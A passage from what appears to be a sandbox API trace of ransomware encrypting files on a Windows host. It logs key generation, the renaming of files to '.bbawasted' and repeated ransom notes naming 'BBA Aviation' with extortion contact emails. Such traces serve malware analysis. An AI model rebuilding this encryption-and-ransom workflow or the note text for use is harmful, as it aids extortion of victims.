KEY:\r\n[begin_key]AP9UbmpJs9Mw8qi2G9CYJjH5EdoTyGGYs1W/82I5UdiqI6736GwHb4d0N5T1D4Lx\r\nVtEgKosz4KatfLVawcpSKsCi0/EglDUBPeF5o+TF3mV8IX5sa70APFphvuIZSRxH\r\nq06vdslzTyT9/lTWd4pMN0VX7N9YdECEJj+ylcf18y3+UD9YnWMThT1ispRSAHo8\r\nGq7mGSL/7Z5DaoKfUez6tOPbmlM2qKA3rpIVj+ZJIX3AKReca2Kkfq+3YidTI9dy\r\n4aSRlG/4iIIPNeyR0GYaSPE8gI4IVvBflWn12Nf9AuluJoPgp+jo+eQ244Bghbb9\r\ni5jsAtDGH6JKKUmrjSJ/Nb8xObzo8lZ61F/xUF7aWu2pugUIP+Sgkb5qYSrVoITf\r\noD6izj5WFCeeJlqKBDbJ9nxQiiHUKtqrnrNoj7QwaY1EVdn1LN6m5El2tZxZAsme\r\nowuCaAOckbLEH84Z5K82q16eJ37rSz1/4Z3S53BtlfZ/Gz1v6BjM1iREABIhQ7Nl\r\nw1uy/8lxDnoYtUg6xiUZ2BtbNhBO+RP0fsujLaPF7B2uPQ+Vy86qscgZtoyf92BW\r\n1rcejUsDbSgFQ5p5Xu1TkaxDOA8LbQNYCLvHYEGyrJ+w78RjCF/WREVWCsvnoDXC\r\nP2evw5EdiiJjjygpaF0bKx57bVurqAWIVhw8OmSs/+i=[end_key]\r\nKEEP IT\r\n") returned 984 [0159.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be768 | out: hHeap=0x660000) returned 1 [0159.053] WriteFile (in: hFile=0x288, lpBuffer=0x6add90*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6add90*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0159.053] SetEndOfFile (hFile=0x288) returned 1 [0159.055] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6add90 | out: hHeap=0x660000) returned 1 [0159.055] CloseHandle (hObject=0x288) returned 1 [0159.057] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0159.058] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x670048 | out: hHeap=0x660000) returned 1 [0159.058] _aulldvrm () returned 0x0 [0159.058] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x66d3a8) returned 1 [0159.059] CryptGenRandom (in: hProv=0x66d3a8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0159.059] CryptReleaseContext (hProv=0x66d3a8, dwFlags=0x0) returned 1 [0159.059] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 39 [0159.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x69e318 [0159.059] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0159.059] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6add90 [0159.059] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x66d3a8) returned 1 [0159.060] CryptGenRandom (in: hProv=0x66d3a8, dwLen=0xa3a, pbBuffer=0x6add90 | out: pbBuffer=0x6add90) returned 1 [0159.060] CryptReleaseContext (hProv=0x66d3a8, dwFlags=0x0) returned 1 [0159.060] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0159.063] WriteFile (in: hFile=0x288, lpBuffer=0x6add90*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6add90*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0159.064] SetEndOfFile (hFile=0x288) returned 1 [0159.065] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.065] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6add90 | out: hHeap=0x660000) returned 1 [0159.065] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0159.065] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf.bbawasted")) returned 1 [0159.066] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0159.127] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0159.128] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d8f) returned 0x630000 [0159.128] CloseHandle (hObject=0x284) returned 1 [0159.145] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef48) returned 1 [0159.145] CryptGenRandom (in: hProv=0x6aef48, dwLen=0x1b8, pbBuffer=0x6be5a8 | out: pbBuffer=0x6be5a8) returned 1 [0159.146] CryptReleaseContext (hProv=0x6aef48, dwFlags=0x0) returned 1 [0159.146] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef48) returned 1 [0159.146] CryptGenRandom (in: hProv=0x6aef48, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0159.146] CryptReleaseContext (hProv=0x6aef48, dwFlags=0x0) returned 1 [0159.158] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be560 | out: hHeap=0x660000) returned 1 [0159.158] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b5190 [0159.158] _snwprintf (in: _Dest=0x6b5190, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]AgEdX7Hsq/i8yNKx2cCMDukkFhd1BCrGCe29X3bok/BB2rHeSl1axU84iZ6Dqkkw\r\nGysV3ijODme0LCAb+8k6RXTgVkBtkTu4OKm/AlYIlXWeVY2fbZx1bjFA/xayaqg1\r\nAfdXVEFceH8hFkzzJlPY+5UitU26pbARydxgf7F+tutCgRUCZ78zTO0x2gJ2U1b4\r\nHPpEC5T9/2LXUA/1DCtgJ7mqhyWf4kEIOTVAsJ/AeaEyEIMip5EdTZ9J154G8jKD\r\ngq5nZy5i8o6LWmExGyqHSuHMm1YySK2NrLv6PpE2yZm6xe7BG67nOJ5r5nZQGfrZ\r\ndRn3D6goqKv3TkHWScuVtM0miliYgTulpV5yiM6lw7wQCuzcdzOLOzwUVgTbaedc\r\nYhbcS/puA7HuXbRd98mEh5ihX6S+XyzGBEW9amL6zyr2Z0Z5iwPAx/1cD/EYQdpP\r\nncHtcfO6m6hHKl9hKbg7dcDfOa510F3d+nFPlsH3xjtODi6f+VQPPm7xQDDCzDYd\r\n2Q9/Dc6WEYmPS6ADyGdvMULOqqEOkX9LKG2zuxANT3IWe+bOe/YgPXdRY+XAzGE+\r\n3e8eufhHyNlK7Z4vYCmCsTJHzUK+LpRAnDotKhPmjJvbauJiFrHhcnaNb3/SlnKL\r\nLiRWLpTlF8xDLI8fncOBXBA+Lb8O4ZmUJ/oXPTp7gRR=[end_key]\r\nKEEP IT\r\n") returned 984 [0159.158] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0159.158] WriteFile (in: hFile=0x288, lpBuffer=0x6b5190*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b5190*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0159.158] SetEndOfFile (hFile=0x288) returned 1 [0159.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.356] CloseHandle (hObject=0x288) returned 1 [0159.369] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0159.369] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66d1d0 | out: hHeap=0x660000) returned 1 [0159.369] _aulldvrm () returned 0x0 [0159.369] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef68) returned 1 [0159.370] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0159.370] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.370] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 39 [0159.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x69e318 [0159.370] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0159.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b5190 [0159.371] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef68) returned 1 [0159.371] CryptGenRandom (in: hProv=0x6aef68, dwLen=0xa3a, pbBuffer=0x6b5190 | out: pbBuffer=0x6b5190) returned 1 [0159.371] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.372] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0159.376] WriteFile (in: hFile=0x288, lpBuffer=0x6b5190*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b5190*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0159.378] SetEndOfFile (hFile=0x288) returned 1 [0159.378] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.378] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.378] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0159.378] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf.bbawasted")) returned 1 [0159.379] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0159.380] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0159.380] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x18a5 [0159.380] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18a5) returned 0x630000 [0159.380] CloseHandle (hObject=0x28c) returned 1 [0159.388] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0159.454] CloseHandle (hObject=0x280) returned 1 [0159.454] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0159.454] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef68) returned 1 [0159.454] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0159.454] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.454] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef68) returned 1 [0159.455] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0159.455] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.464] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0159.464] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0159.464] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b5190 [0159.464] _snwprintf (in: _Dest=0x6b5190, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]kj1iutW3VvANFStkEq8bSIGCp415bh+7X8P8re0SINiXFMVroqZj7vbMLfHXnFrN\r\nO30RUwuT73YxbjIpd5C1qJ563P9axqTYVLg2vjA+r2MWrGUC5fECI0LhdFQP5Q5Z\r\napxg87kNoOCCUQmcNU7oTvigpnPqYFniq8lkNTfwRDtmoZasiyn1sQ68KY/6v2hX\r\nlr91FLPfiOaD8/m0OQ5NPxiAjpkmLB3DvQaha/hAQOJmjy/RsR+1KmOZVxssqR+f\r\nd8pv7xMWjhAF3a/OAawVOPKhk+Rlc52DoUBhzjDwOlzVOdLmMXPdBIFIX3b2Rww+\r\neK4R5BUpb1EQXtpPkjN8bXuUul5NeW56tDkXaxUwFPxV2gsncXHHDYIwD32ACQAP\r\nqsfH2a98mo6PNMY1NDjcfdmQYo63cNtD4o+3wtjkjXXEKGGAIaGAhowTZXil/AHl\r\nXZfYUgLCjo38yGds/HduykC7hmO1IhHGT7Vvv7JmA+3FjlqopeaHcDrJTSTP5euc\r\nqKVthOMiIQ/zL+XGUGgPl+x88QYb/mPm+UHf5V2QRRziyWGHWVrwYO7KjhA+HeU2\r\ntsx3Yu/c08Jfgk6kmnEuqb8i4XIClRV//TPnOAoP8zSqGpvwc2RZwBbdT62zKtXU\r\nZVB05j5ozEHPkBGmj6C4ZkLr2I283mUwWDpeYZcy94M=[end_key]\r\nKEEP IT\r\n") returned 984 [0159.464] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.464] WriteFile (in: hFile=0x288, lpBuffer=0x6b5190*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b5190*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0159.464] SetEndOfFile (hFile=0x288) returned 1 [0159.467] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.467] CloseHandle (hObject=0x288) returned 1 [0159.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0159.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66c898 | out: hHeap=0x660000) returned 1 [0159.470] _aulldvrm () returned 0x0 [0159.470] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef68) returned 1 [0159.470] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0159.470] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.470] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 48 [0159.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x69e318 [0159.470] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0159.470] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b5190 [0159.470] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef68) returned 1 [0159.471] CryptGenRandom (in: hProv=0x6aef68, dwLen=0xa3a, pbBuffer=0x6b5190 | out: pbBuffer=0x6b5190) returned 1 [0159.471] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.471] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0159.472] WriteFile (in: hFile=0x288, lpBuffer=0x6b5190*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b5190*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0159.473] SetEndOfFile (hFile=0x288) returned 1 [0159.473] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0159.474] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0159.474] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml.bbawasted")) returned 1 [0159.474] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0159.474] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0159.474] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xed90 [0159.475] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xed90) returned 0x630000 [0159.475] CloseHandle (hObject=0x280) returned 1 [0159.600] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0159.601] CloseHandle (hObject=0x28c) returned 1 [0159.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0159.601] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef68) returned 1 [0159.601] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0159.601] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.601] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef68) returned 1 [0159.602] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0159.602] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0159.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0159.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0159.611] _snwprintf (in: _Dest=0x6a5e60, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]NUTnERx+Ae9B2tlxl4WX50JrwsL/FA+D5PMcSyxyM5e21Y0kwUE0ZhkkdG840cLJ\r\nhPWcq/TKqzN/yyfn9AVf1C6QMvRaXjNjVGJjuCqD0ZUqCaAXCl5UMORcOVOGLig3\r\nuLvstFg22vixuF6toKRCEVh33v1fykDUF4HTOG8nzJwkkQafuRrjSKwQNTMOQi2C\r\n+B9mdDItxohvCTmDRWKUCnB5ufMdJgBKQ38VPv5bWDHWzR7lqUx7cwImf6+i/XkO\r\nVeKzMekElWCCjk9wXgPWirmo8MTQQhp0LmuYTXzfthilNL88fO1jCSySmAMfRhpV\r\nQcTeZv5KDnxNADbSX6JhxnUNSDo72X3pAjoG8Mf4EjvKtFZ78dAcpH70OpPmg5Dh\r\nLH2gHSmU/iNcq46TTJjZm7K/wP8mQ90o4152PV0emmHMTi2F04fpHT8/cfmFKycn\r\nIHJLnIWY6KTydreRTLovhHPIqSqZ0y62rkmg7lYGEgguGnkyN7tcGhbOV+KoWWjz\r\nVDfi/nEEX+vjBM4fk5eG5yNKy9SurgUMOKWLg3/Ud9KkT+Se+uLXn1ZzUrKswrTq\r\nbjvaTONJkxWCcjFOBwIr246Er3Ji3wUdbrWUfti1uHL8ovHFKQu5bwGwj4H+Bz7j\r\n52l4OmOTUbZOjMhAWR7447vYk9/cPFGyX0HKrz9vgsd=[end_key]\r\nKEEP IT\r\n") returned 984 [0159.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.611] WriteFile (in: hFile=0x288, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0159.612] SetEndOfFile (hFile=0x288) returned 1 [0159.614] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0159.614] CloseHandle (hObject=0x288) returned 1 [0159.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0159.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66d988 | out: hHeap=0x660000) returned 1 [0159.616] _aulldvrm () returned 0x0 [0159.616] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef68) returned 1 [0159.617] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0159.617] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.617] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 39 [0159.617] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x69e318 [0159.617] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0159.617] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0159.617] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef68) returned 1 [0159.617] CryptGenRandom (in: hProv=0x6aef68, dwLen=0xa3a, pbBuffer=0x6a5e60 | out: pbBuffer=0x6a5e60) returned 1 [0159.617] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0159.617] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0159.623] WriteFile (in: hFile=0x288, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, 